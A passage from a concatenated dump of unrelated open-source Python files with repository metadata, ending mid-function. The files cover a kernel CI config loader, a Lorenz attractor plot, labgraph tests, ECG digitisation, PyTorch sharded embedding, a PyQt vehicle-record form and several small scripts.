fragments = {\n name: Fragment.from_yaml(config, name)\n for name, config in data.get('fragments', {}).iteritems()\n }\n\n build_environments = {\n name: BuildEnvironment.from_yaml(config, name)\n for name, config in data['build_environments'].iteritems()\n }\n\n defaults = data.get('build_configs_defaults', {})\n\n build_configs = {\n name: BuildConfig.from_yaml(config, name, trees, fragments,\n build_environments, defaults)\n for name, config in data['build_configs'].iteritems()\n }\n\n config_data = {\n 'trees': trees,\n 'fragments': fragments,\n 'build_environments': build_environments,\n 'build_configs': build_configs,\n }\n\n return config_data\n\n\ndef tests_from_yaml(yaml_path):\n with open(yaml_path) as f:\n data = yaml.load(f)\n\n fs_types = {\n name: RootFSType.from_yaml(fs_type)\n for name, fs_type in data['file_system_types'].iteritems()\n }\n\n file_systems = {\n name: RootFS.from_yaml(fs_types, rootfs)\n for name, rootfs in data['file_systems'].iteritems()\n }\n\n plan_filters = FilterFactory.from_yaml(data['test_plan_default_filters'])\n\n test_plans = {\n name: TestPlan.from_yaml(name, test_plan, file_systems, plan_filters)\n for name, test_plan in data['test_plans'].iteritems()\n }\n\n device_filters = FilterFactory.from_yaml(data['device_default_filters'])\n\n device_types = {\n name: DeviceTypeFactory.from_yaml(name, device_type, device_filters)\n for name, device_type in data['device_types'].iteritems()\n }\n\n test_configs = [\n TestConfig.from_yaml(test_config, device_types, test_plans)\n for test_config in data['test_configs']\n ]\n\n config_data = {\n 'file_systems': file_systems,\n 'test_plans': test_plans,\n 'device_types': device_types,\n 'test_configs': test_configs,\n }\n\n return config_data\n","repo_name":"roxell/test-kernelci-core","sub_path":"kernelci/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":27899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73411481512","text":"import matplotlib.pyplot as plt\r\n\r\n# Given the equations, defining the values of parameters\r\nsigma = 10\r\nbeta = 8/3\r\nrho= 28\r\ndt = 0.01\r\n\r\n# Get Equations\r\ndef equations(a, b, c):\r\n return sigma*(b-a), rho*a-a*c-b, a*b-beta*c\r\n\r\n\r\ndef f_coordinates(x, y, z):\r\n n = 13500 #steps\r\n t = 2\r\n \r\n #Initialize empty arrays for coordinates of X, Y, Z\r\n x_new = []\r\n y_new = []\r\n z_new = []\r\n \r\n #Determine coordinates of the point, step-by-step\r\n for i in range(n):\r\n dxdt, dydt, dzdt = equations(x, y, z)\r\n dx = dxdt * dt\r\n dy = dydt * dt\r\n dz = dzdt * dt\r\n \r\n x = x + dx\r\n y = y + dy\r\n z = z + dz\r\n t = t + dt\r\n \r\n x_new.append(x)\r\n y_new.append(y)\r\n z_new.append(z)\r\n \r\n\r\n # Plot\r\n r = plt.figure().add_subplot(projection='3d')\r\n r.plot(x_new, y_new, z_new, lw=0.5)\r\n r.set_xlabel(\"x\")\r\n r.set_ylabel(\"y\")\r\n r.set_zlabel(\"z\")\r\n r.set_title(\"Lorenz Attractor\", fontname=\"Times New Roman\", fontweight=\"bold\", fontsize=18)\r\n plt.savefig('xyz.png')\r\n plt.show()\r\n\r\n\r\n fig, u = plt.subplots(1, 3, sharex=False, sharey=False, figsize=(17, 6))\r\n \r\n # plot the x values vs the y values\r\n u[0].plot(x_new, y_new, color='r', alpha=0.7, linewidth=0.3)\r\n u[0].set_title('X-Y phase plane', fontweight=\"bold\" )\r\n # plot the x values vs the z values\r\n u[1].plot(x_new, z_new, color='m', alpha=0.7, linewidth=0.3)\r\n u[1].set_title('X-Z phase plane', fontweight=\"bold\")\r\n # plot the y values vs the z values\r\n u[2].plot(y_new, z_new, color='b', alpha=0.7, linewidth=0.3)\r\n u[2].set_title('Y-Z phase plane', fontweight=\"bold\")\r\n\r\n plt.savefig(\"subplots.png\")\r\n plt.show()\r\n\r\nif __name__ == '__main__': \r\n f_coordinates(0., 1., 1.05)\r\n","repo_name":"jacopomartellotto/Lorenz_Attractor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17793709001","text":"import asyncio\nfrom typing import Any\n\nimport pytest\n\nfrom ...graphs import AsyncPublisher, Topic\nfrom ...graphs.method import get_method_metadata\nfrom ...messages import Message\nfrom .. import BaseEventGenerator, BaseEventGeneratorNode, EventPublishingHeap\n\n\npytest_plugins = [\"pytest_mock\"]\n\n\nclass MyMessage(Message):\n my_field: str\n\n\nclass MyBaseEventGenerator(BaseEventGenerator):\n def __init__(self) -> None:\n self.heap = EventPublishingHeap()\n\n def generate_events(self) -> EventPublishingHeap:\n return self.heap\n\n def set_topics(self) -> None:\n pass\n\n\nclass MyBaseEventGeneratorNode(BaseEventGeneratorNode):\n\n MY_TOPIC = Topic(MyMessage)\n\n async def publish_events(self) -> AsyncPublisher:\n return await super().publish_events()\n\n\n@pytest.fixture\ndef event_loop(): # type: ignore\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n yield loop\n loop.close()\n\n\ndef test_base_event_generator_node_meta(mocker: Any) -> None:\n node = MyBaseEventGeneratorNode()\n publisher_metadata = get_method_metadata(node.publish_events)\n topic = publisher_metadata.published_topics[0]\n assert topic.name == node.MY_TOPIC.name\n assert topic.message_type == node.MY_TOPIC.message_type\n\n\ndef test_base_event_generator_node_init(mocker: Any) -> None:\n mock_time = mocker.patch(\n \"labgraph.events.event_generator_node.time\"\n )\n mock_time.return_value = 0.0\n node = MyBaseEventGeneratorNode()\n assert node._start_time == 0.0\n\n\ndef test_base_event_generator_node_elapsed(mocker: Any) -> None:\n mock_time = mocker.patch(\n \"labgraph.events.event_generator_node.time\"\n )\n mock_time.side_effect = [0.0, 1.0]\n node = MyBaseEventGeneratorNode()\n assert node._time_elapsed_since_start() == 1.0\n\n\ndef test_base_event_generator_node_generator(mocker: Any) -> None:\n generator = MyBaseEventGenerator()\n node = MyBaseEventGeneratorNode()\n node.setup_generator(generator)\n assert node._generator == generator\n assert node.generate_events() == generator.heap\n\n\ndef test_base_event_generator_node_publish(event_loop: Any, mocker: Any) -> None:\n node = MyBaseEventGeneratorNode()\n with pytest.raises(NotImplementedError):\n _ = event_loop.run_until_complete(node.publish_events())\n","repo_name":"facebookresearch/labgraph","sub_path":"labgraph/events/tests/test_event_generator_node.py","file_name":"test_event_generator_node.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"72"} +{"seq_id":"41749170441","text":"countries = []\ncities = []\ncapital = []\ncities_letters = {}\nletter_count = []\n\ndef founder(_founders):\n return _founders['Accession']\n\nwith open('eu.csv','r',encoding='utf-8') as source:\n\n for line in source:\n country_list=line.strip().split(',')\n country = {'Country': country_list[0], 'Capital': country_list[1], 'Accession': country_list[2]}\n countries.append(country)\n\ncountries.sort(key=founder)\n\nmin = countries[0]['Accession']\nprint(countries)\nfor z in range(len(country)):\n if min > countries[z]['Accession']:\n min = countries[z]['Accession']\n\nsum = 0\nfor i in countries:\n year = i['Country']\n if i['Accession'] == min:\n sum += 1\n\nfor x in countries:\n cities.append(x['Capital'])\nfor y in cities:\n if y[0]==\"B\":\n capital.append(y)\n\nletters = []\nfor country in countries:\n letters.append(len(country['Country']))\nletters.sort()\nfourth_shortest = letters[3] # ezt nem nagyon ertem, nem en csinaltam\n\nprint(sum,'Alapítója van az EU-nak.')\nprint('B-s fővárosok: ',capital)\nprint(fourth_shortest)\n\n\n\n\n","repo_name":"Arian1216/bolyai","sub_path":"om30.py","file_name":"om30.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1175983735","text":"from typing import Optional, Union\nfrom dataclasses import dataclass\nfrom enum import Enum\n\nimport numpy as np\n\nfrom ecgdigitize.image import ColorImage\nfrom . import common\nfrom .grid import detection as grid_detection\nfrom .grid import extraction as grid_extraction\nfrom .signal import detection as signal_detection\nfrom .signal.extraction import viterbi\nfrom . import vision\n\n\ndef estimateRotationAngle(image: ColorImage, houghThresholdFraction: float = 0.25) -> Optional[float]:\n binaryImage = grid_detection.thresholdApproach(image)\n\n houghThreshold = int(image.width * houghThresholdFraction)\n lines = vision.houghLines(binaryImage, houghThreshold)\n\n # <- DEBUG ->\n # from ecgdigitize import visualization\n # visualization.displayImage(visualization.overlayLines(lines, image))\n\n angles = common.mapList(lines, vision.houghLineToAngle)\n offsets = common.mapList(angles, lambda angle: angle % 90)\n candidates = common.filterList(offsets, lambda offset: abs(offset) < 30)\n\n if len(candidates) > 1:\n estimatedAngle = common.mean(candidates)\n return estimatedAngle\n else:\n return None\n\n\nclass SignalDetectionMethod(Enum):\n default = 'default'\n\n\nclass SignalExtractionMethod(Enum):\n default = 'default'\n\n\ndef digitizeSignal(\n image: ColorImage,\n detectionMethod: SignalDetectionMethod = SignalDetectionMethod.default,\n extractionMethod: SignalExtractionMethod = SignalExtractionMethod.default\n) -> Union[np.ndarray, common.Failure]:\n # First, convert color image to binary image where signal pixels are turned on (1) and other are off (0)\n if detectionMethod == SignalDetectionMethod.default:\n binary = signal_detection.adaptive(image)\n else:\n raise ValueError(\"Unrecognized SignalDetectionMethod in `digitizeSignal`\")\n\n # Second, analyze the binary image to produce a signal\n if extractionMethod == SignalExtractionMethod.default:\n signal = viterbi.extractSignal(binary)\n else:\n raise ValueError(\"Unrecognized SignalExtractionMethod in `digitizeSignal`\")\n\n return signal\n\n\nclass GridDetectionMethod(Enum):\n default = 'default'\n\n\nclass GridExtractionMethod(Enum):\n default = 'default'\n\n\ndef digitizeGrid(\n image: ColorImage,\n detectionMethod: GridDetectionMethod = GridDetectionMethod.default,\n extractionMethod: GridExtractionMethod = GridExtractionMethod.default\n) -> Union[float, common.Failure]: # Returns size of grid in pixels\n # First, convert color image to binary image where grid pixels are turned on (1) and all others are off (0)\n if detectionMethod == GridDetectionMethod.default:\n # Nothing intelligent; just gets all non-white pixels\n binary = grid_detection.allDarkPixels(image)\n else:\n raise ValueError(\"Unrecognized GridDetectionMethod in `digitizeGrid`\")\n\n # Second, analyze the binary image to estimate the grid spacing (period)\n if extractionMethod == GridExtractionMethod.default:\n gridPeriod = grid_extraction.estimateFrequencyViaAutocorrelation(binary.data)\n else:\n raise ValueError(\"Unrecognized GridExtractionMethod in `digitizeSignal`\")\n\n return gridPeriod\n\n","repo_name":"Tereshchenkolab/paper-ecg","sub_path":"src/main/python/ecgdigitize/ecgdigitize.py","file_name":"ecgdigitize.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"14831362729","text":"\nimport torch\nimport torch.distributed as dist\nfrom torch.distributed._shard.sharded_tensor import ShardedTensor\nfrom torch.distributed._shard.sharding_spec import ChunkShardingSpec\nfrom torch.distributed._shard.sharding_spec.api import custom_sharding_spec_op\nfrom torch.distributed.nn.functional import all_gather, reduce_scatter\n\nfrom ._common import (\n _all_gather_base_input,\n _handle_col_wise_sharding_base,\n _handle_max_norm_col_wise,\n _handle_row_wise_mask,\n)\n\n\n@custom_sharding_spec_op(ChunkShardingSpec, torch.nn.functional.embedding)\ndef sharded_embedding(types, args, kwargs, pg):\n \"\"\"\n Handles ``__torch_function__`` dispatch for ``torch.nn.functional.embedding``.\n This method computes a sharded embedding lookup and has the following limitations:\n\n 1. Supports only sharding of ``weight``.\n 2. Supports only ``ChunkShardingSpec``.\n 3. Supports only a single local shard per rank.\n 4. Supports all specs except for scale_grad_by_freq, sparse, etc.\n\n Based on the dimension that the weight is sharded on, there are two\n algorithms:\n\n ROWWISE SHARDING\n ================\n For row-wise sharding the weight is sharded on dimension 0.\n\n The overall algorithm can be best explained with an example. Let's assume\n the dims for input are (4 x 6) and W are (10 x 17) and W is sharded across\n 4 GPUs creating 3 shard of (3 x 17) and 1 shard of (1 x 17).\n The algorithm is as follows:\n\n 1. First the input is all gathered to all ranks, since this is SPMD and\n input is actually sharded across all ranks. The inputs then become a\n 4 (4 x 6) tensor on each rank. For example if the given input is\n tensor([[6, 5, 2, 9, 6, 3],\n [3, 1, 2, 4, 7, 6],\n [4, 0, 4, 9, 8, 9],\n [8, 6, 6, 4, 6, 1]])\n on rank 0.\n Then on every rank, we will have this tensor.\n If input itself is already replicated, no all-gather will be done.\n 2. Next, we mask the ID which are not stored on that rank.\n For example on rank 0, we store ID [0, 1, 2]. We only keep the ID\n inside the set of numbers. The rest of them will be masked to an extra row.\n The masked matrix will be used for embedding look up and is like:\n tensor([[4, 4, 2, 4, 4, 4],\n [4, 1, 2, 4, 4, 4],\n [4, 0, 4, 4, 4, 4],\n [4, 4, 4, 4, 4, 1]])\n The reason of having an extra row (aka, number 4 in the example) is\n because when max_norm is specified only weight which has looked will\n be re-normed so mask IDs whose embeddings are not stored in current\n rank will to an extra row will ensure max_norm still works as expected.\n 3. If max_norm is specified, the extra row guarantees that the mask ID will\n not affect the behavior of weigh re-norm.\n\n COLWISE SHARDING\n ================\n For col-wise sharding the weight is sharded on dimension 1.\n\n The overall algorithm can be best explained with an example. Let's assume\n the dims for input are (4 x 6) and W are (16 x 17) and W is sharded across\n 4 GPUs creating 3 shards of (16 x 5) and 1 shard of (16 x 2).\n The algorithm is as follows:\n\n 1. First the input is broadcasted to all ranks, since this is SPMD we\n actually do an all_gather for all the inputs resulting in 4 (4 x 6)\n inputs on each rank.\n 2. Next we perform local embedding lookup operation by apply each\n input (4 x 6) with the local shard (16 x 5) ((16 x 2) for the last).\n This results in 4 (5 x 6 x 4) ((2 x 6 x 4) for the last) matrices\n on each rank. We transpose dim 0 and dim 2.\n 3. Next, we concat these 4 matrices and perform an all2all to share the\n appropriate (5 x 6 x 4) or (2 x 6 x 4) matrices to each rank.\n 4. Now, each rank receives a (17 x 6 x 4) matrix which is basically the\n size of the result we need.\n 5. If placements are not in order any appropriate rearrangement of columns\n are done for the (17 x 6 x 4) matrix and finally we transpose the\n dim 0 and dim 2 again.\n 6. If max_norm is specified, we manually sum up the norm and renorm. Because\n the renorm must be in place, we need to override the local_shard to mimic\n this behavior.\n \"\"\"\n # Validate input params\n _validate_embedding_param(args, kwargs)\n\n input = args[0]\n weight = args[1]\n max_norm = kwargs.get(\"max_norm\")\n norm_type = kwargs.get(\"norm_type\")\n padding_idx = kwargs.get(\"padding_idx\")\n\n local_shard = weight.local_tensor().contiguous()\n sharding_dim = weight._sharding_spec.dim\n world_size = dist.get_world_size(pg)\n rank = dist.get_rank(pg)\n\n if sharding_dim == 1:\n output, local_shard = _handle_col_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, pg\n )\n weight.local_shards()[0].tensor = local_shard\n return output\n elif sharding_dim == 0:\n return _handle_row_wise_sharding(\n input,\n world_size,\n weight,\n local_shard,\n max_norm,\n norm_type,\n padding_idx,\n rank,\n pg,\n )\n else:\n raise RuntimeError(\n f\"nn.Embedding weight sharded on dim {sharding_dim} not supported!\"\n )\n\n\ndef _validate_embedding_param(args, kwargs):\n \"\"\"\n Validate input params of sharded embedding op.\n\n Args:\n input: list of ID used for lookup.\n weight: sharded weight tensor.\n kwargs: same as normal Embedding.\n\n Return: None.\n \"\"\"\n\n input = args[0]\n weight = args[1]\n max_norm = kwargs.get(\"max_norm\")\n scale_grad_by_freq = kwargs.get(\"scale_grad_by_freq\")\n sparse = kwargs.get(\"sparse\")\n\n # Validate types\n if not isinstance(input, torch.Tensor):\n raise TypeError(\"input need to be torch.Tensor\")\n if not isinstance(weight, ShardedTensor):\n raise TypeError(\"weight needs to be ShardedTensor\")\n weight_size = weight.size()\n if len(weight_size) != 2:\n raise ValueError(\"Weight needs to have exactly 2 dims\")\n if int(torch.min(input).item()) < 0:\n raise ValueError(\n \"Index out of range in Input %d %d\",\n int(torch.min(input).item()),\n weight_size[1],\n )\n if int(torch.max(input).item()) >= weight_size[0]:\n raise ValueError(\n \"Index out of range in Input %d %d\",\n int(torch.max(input).item()),\n weight_size[1],\n )\n if scale_grad_by_freq:\n raise RuntimeError(\n 'nn.Embedding weight sharded with flag on \"scale_grad_by_freq\" not supported!'\n )\n if sparse:\n raise RuntimeError(\n 'nn.Embedding weight sharded with flag on \"sparse\" not supported!'\n )\n if max_norm and max_norm <= 0.0:\n raise ValueError('\"max_norm\" must be larger than zero!')\n\n if not isinstance(weight._sharding_spec, ChunkShardingSpec):\n raise ValueError(\"Only ChunkShardingSpec supported for ShardedTensor ops!\")\n if len(weight.local_shards()) != 1:\n raise ValueError(\"Only one local shard supported!\")\n\n\ndef _handle_col_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, pg\n):\n \"\"\"\n Entry-point function to handle the logic of col-wise sharding of weight\n for embedding. (Detailed explanations of the logic can be found in\n the comment for sharded_embedding.)\n\n Args:\n input: list of ID used for lookup and aggregation.\n world_size: number of ranks.\n weight: sharded weight tensor.\n local_shard: col-wise shared local weight used for lookup.\n max_norm: If given, each embedding vector with norm larger\n than max_norm is renormalized to have norm max_norm.\n Note: this will modify weight in-place.\n norm_type: The p in the p-norm to compute for the max_norm option.\n padding_idx: If specified, the entries at padding_idx do\n not contribute to the gradient; therefore, the embedding\n vector at padding_idx is not updated during training,\n i.e. it remains as a fixed “pad”.\n pg: process group.\n\n Returns: final result of lookup.\n \"\"\"\n # allgather the inputs first for non Replicated Tensor.\n gathered_inputs = all_gather(input, group=pg)\n\n if max_norm is not None:\n # max_norm changes the weight in-place\n local_shard = _handle_max_norm_col_wise(\n max_norm, norm_type, local_shard, input, world_size, gathered_inputs, pg\n )\n\n output = _handle_col_wise_sharding_base(\n torch.nn.functional.embedding,\n len(input.size()),\n input,\n world_size,\n weight,\n local_shard,\n pg,\n gathered_inputs,\n padding_idx=padding_idx,\n )\n return (output, local_shard)\n\n\ndef _handle_row_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, rank, pg\n):\n \"\"\"\n Entry-point function to handle the logic of row-wise sharding of weight\n for embedding. (Detailed explanations of the logic can be found in\n the comment for sharded_embedding.)\n\n Args:\n input: list of ID used for lookup and aggregation.\n world_size: number of ranks.\n weight: sharded weight tensor.\n local_shard: row-wise shared local weight used for lookup.\n max_norm: If given, each embedding vector with norm larger\n than max_norm is renormalized to have norm max_norm.\n Note: this will modify weight in-place.\n norm_type: The p in the p-norm to compute for the max_norm option.\n padding_idx: If specified, the entries at padding_idx do\n not contribute to the gradient; therefore, the embedding\n vector at padding_idx is not updated during training,\n i.e. it remains as a fixed “pad”.\n rank: # of cuda process.\n pg: process group.\n\n Returns: final result of lookup.\n \"\"\"\n # allgather the inputs first for non Replicated Tensor.\n gather_inp = _all_gather_base_input(input, pg)\n\n # Mask the input according to sharding spec.\n lookup_input, padding_idx, padding_row = _handle_row_wise_mask(\n gather_inp, padding_idx, weight, world_size, rank\n )\n\n # When input is a large tensor, the value of weight is changed.\n # This is a walk-around for now. GH issue: #81717\n if max_norm is not None:\n torch.nn.functional.embedding(\n torch.unique(lookup_input)[:-1],\n local_shard,\n padding_idx=padding_idx,\n max_norm=max_norm,\n norm_type=norm_type,\n )\n max_norm = None\n\n local_input_embeddings = torch.nn.functional.embedding(\n lookup_input,\n torch.cat([local_shard, padding_row]),\n padding_idx=padding_idx,\n max_norm=max_norm,\n norm_type=norm_type,\n )\n\n # TODO: Make the result a PartialTensor.\n local_shards = local_input_embeddings.chunk(pg.size())\n return reduce_scatter(\n torch.empty_like(local_shards[0]),\n list(local_shards),\n group=pg,\n )\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/_shard/sharding_spec/chunk_sharding_spec_ops/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":11190,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"25706513375","text":"import sys, time, os\n\ntop = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '..', '..'))\nsys.path.append(os.path.join(top, 'src', 'python'))\nimport solar_capture as sc\n\n\nargs = sys.argv[1:]\nassert len(args) == 1\nn_workers = int(args[0])\n\nthrd_attr = dict(busy_wait=0)\n\nscs = sc.new_session()\nthrd = scs.new_thread(attr=thrd_attr)\n\nsrc = thrd.new_node('sc_pool_forwarder')\nsrc = src.connect(thrd.new_node('sct_seq32', args=dict(offset=0)))\nsrc = src.connect(thrd.new_node('sc_rr_spreader'))\n\nsink = thrd.new_node('sc_rr_gather')\nsink.connect(thrd.new_node('sct_seq32_check', args=dict(offset=0)))\n\nfor i in range(n_workers):\n wthrd = scs.new_thread(attr=thrd_attr)\n worker = wthrd.new_node('sc_sim_work', args=dict(per_packet_ns=1000000))\n sc.connect(src, worker)\n sc.connect(worker, sink)\n\nscs.go()\nwhile True:\n time.sleep(10000)\n","repo_name":"Xilinx-CNS/solarcapture","sub_path":"src/test/rr_spread.py","file_name":"rr_spread.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"43686002722","text":"# Importation des bibliothèques nécessaires\nimport streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\n# Créez une fonction pour afficher un graphique avec filtre\ndef show_grouped_data(group_by, data_type, group_by_option, data_type_option, month, filtered_df):\n days_order = ['Lundi', 'Mardi', 'Mercredi', 'Jeudi', 'Vendredi', 'Samedi', 'Dimanche']\n\n df_grouped = filtered_df.copy()\n if group_by == 'Jour':\n df_grouped['Jour'] = pd.Categorical(df_grouped['Jour'], categories=days_order, ordered=True)\n grouped = df_grouped.groupby('Jour')[data_type].sum().reset_index()\n\n elif group_by == 'Mois et Jour' and month:\n df_grouped['mois'] = df_grouped['Date'].dt.to_period(\"M\")\n df_grouped['Jour'] = pd.Categorical(df_grouped['Jour'], categories=days_order, ordered=True)\n grouped = df_grouped[df_grouped['mois'].dt.strftime('%m/%Y') == month].groupby(['mois', 'Jour'])[data_type].sum().reset_index()\n\n # Création d'un graphique bar avec Plotly\n fig = go.Figure()\n fig.add_trace(go.Bar(\n x=grouped['Jour'],\n y=grouped[data_type],\n name=data_type_option\n ))\n fig.update_layout(\n title=f\"Répartition par {group_by_option} : {data_type_option}\",\n xaxis_title=group_by,\n yaxis_title=data_type,\n xaxis_tickangle=-45\n )\n st.plotly_chart(fig)\n","repo_name":"Frecel59/catering_service","sub_path":"Analyses/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4483785274","text":"import joblib\nimport numpy as np\n\n# Load the trained model from the file\nlog_reg = joblib.load(\"C:/Users/pc/PycharmProjects/pythonProject1/trained_model.pkl\")\n\narr = np.array([60, 1, 4.08, 38.8, 95, 30.8, 32.4, 15.2, 7.1, 183, 12.6])\nreshaped_arr = arr.reshape(1, -1)\n\n# Load the scaler used for training\n# the path for the scaler used to scale the training data so we use it to scale the input\nscaler = joblib.load(\"C:/Users/pc/PycharmProjects/pythonProject1/scaler.pkl\")\narr_scaled = scaler.transform(reshaped_arr)\n\nprint(log_reg.predict(arr_scaled))\n","repo_name":"AdemBendjama/Brave-Lab","sub_path":"IA_modeles/model-anemia/pythonProject1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42317513636","text":"from PyQt6 import QtCore, QtGui, QtWidgets\r\nfrom PyQt6.QtGui import QIcon\r\nfrom database import Database \r\n\r\nclass Ui_Form(object):\r\n def setupUi(self, Form):\r\n Form.setObjectName(\"Form\")\r\n Form.resize(603, 576)\r\n Form.setWindowIcon(QIcon('logo.png'))\r\n self.verticalLayout = QtWidgets.QVBoxLayout(Form)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.frame = QtWidgets.QFrame(Form)\r\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.frame.setObjectName(\"frame\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.scrollArea = QtWidgets.QScrollArea(self.frame)\r\n self.scrollArea.setWidgetResizable(True)\r\n self.scrollArea.setObjectName(\"scrollArea\")\r\n self.scrollAreaWidgetContents = QtWidgets.QWidget()\r\n self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 563, 487))\r\n self.scrollAreaWidgetContents.setObjectName(\"scrollAreaWidgetContents\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\r\n self.verticalLayout_3.addLayout(self.verticalLayout_4)\r\n self.scrollArea.setWidget(self.scrollAreaWidgetContents)\r\n self.verticalLayout_2.addWidget(self.scrollArea)\r\n self.verticalLayout.addWidget(self.frame)\r\n self.frame_2 = QtWidgets.QFrame(Form)\r\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.frame_2.setObjectName(\"frame_2\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame_2)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.pushButton_2 = QtWidgets.QPushButton(self.frame_2)\r\n self.pushButton_2.setObjectName(\"pushButton_2\")\r\n self.horizontalLayout.addWidget(self.pushButton_2)\r\n self.verticalLayout.addWidget(self.frame_2)\r\n self.save_btn = QtWidgets.QPushButton(self.frame_2)\r\n self.save_btn.setText(\"Сохранить\")\r\n self.horizontalLayout.addWidget(self.save_btn)\r\n self.save_btn.clicked.connect(self.save_data)\r\n\r\n self.out_data()\r\n self.pushButton_2.clicked.connect(Form.close)\r\n\r\n self.retranslateUi(Form)\r\n QtCore.QMetaObject.connectSlotsByName(Form)\r\n \r\n \r\n def out_data(self):\r\n db = Database()\r\n data = db.get_data(status=\"un_checked\")\r\n if len(data) > 0:\r\n for i in range(len(data)):\r\n label = QtWidgets.QLabel(f\"{data[i][0]}\")\r\n label.setMinimumSize(QtCore.QSize(100, 30))\r\n label.setMaximumSize(QtCore.QSize(100, 30))\r\n label.setStyleSheet(\"font-size: 12pt;\")\r\n if data[i][1] == \"ТС эксплуатируется инвалидом или используется для перевозки инвалида\":\r\n label_2 = QtWidgets.QLabel()\r\n label_2.setPixmap(QtGui.QPixmap(':/s/accept.png'))\r\n label_2.setScaledContents(True)\r\n label_2.setMinimumSize(QtCore.QSize(30, 30))\r\n label_2.setMaximumSize(QtCore.QSize(30, 30))\r\n else:\r\n label_2 = QtWidgets.QLabel()\r\n label_2.setPixmap(QtGui.QPixmap(':/s/cross.png'))\r\n label_2.setScaledContents(True)\r\n label_2.setMinimumSize(QtCore.QSize(30, 30))\r\n label_2.setMaximumSize(QtCore.QSize(30, 30))\r\n hor_layout = QtWidgets.QHBoxLayout()\r\n hor_layout.addWidget(label)\r\n hor_layout.addWidget(label_2)\r\n line = QtWidgets.QLineEdit()\r\n line.setMinimumSize(QtCore.QSize(200, 20))\r\n line.setMaximumSize(QtCore.QSize(200, 20))\r\n line.setPlaceholderText(\"Комментарий\")\r\n if data[i][2] != \"\" and data[i][2] is not None:\r\n line.setText(str(data[i][2]))\r\n line.setAlignment(QtCore.Qt.AlignCenter)\r\n hor_layout.addWidget(line)\r\n self.verticalLayout_4.addLayout(hor_layout)\r\n \r\n \r\n def save_data(self):\r\n db = Database()\r\n lines = self.scrollArea.findChildren(QtWidgets.QLineEdit)\r\n nums = self.scrollArea.findChildren(QtWidgets.QLabel)\r\n nums = [i.text().strip() for i in nums]\r\n nums = [i for i in nums if i != \"\"]\r\n for i in range(len(nums)):\r\n db.insert_comment(number=str(nums[i]), comment=str(lines[i].text()))\r\n \r\n \r\n def retranslateUi(self, Form):\r\n _translate = QtCore.QCoreApplication.translate\r\n Form.setWindowTitle(_translate(\"Form\", \"Просмотр базы данных\"))\r\n self.pushButton_2.setText(_translate(\"Form\", \"Закрыть\"))\r\nimport res\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n Form = QtWidgets.QWidget()\r\n ui = Ui_Form()\r\n ui.setupUi(Form)\r\n Form.show()\r\n sys.exit(app.exec_())\r\n\r\n","repo_name":"zerostar019/disabled_persons_car_checker","sub_path":"out_table.py","file_name":"out_table.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25931634192","text":"from numpy.core.numeric import count_nonzero\nimport numpy as np\nimport h5py\nimport os\nfrom math import log, sqrt\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nfrom matplotlib import colors, cm, offsetbox\nfrom mpl_toolkits.mplot3d import Axes3D, proj3d\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nimport time\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise_distances_argmin_min\nfrom yellowbrick.cluster import KElbowVisualizer, SilhouetteVisualizer\nfrom itertools import permutations\nimport numba\nimport random\nimport cv2\n\nfrom deeparpes.autoencoder.data_generator import *\nfrom deeparpes.autoencoder.noise_generator import *\n\n@numba.jit(nopython=True)\ndef sum_all(x_s, y_s, data):\n clean = np.zeros((x_s, y_s))\n for x in range(x_s):\n for y in range(y_s):\n 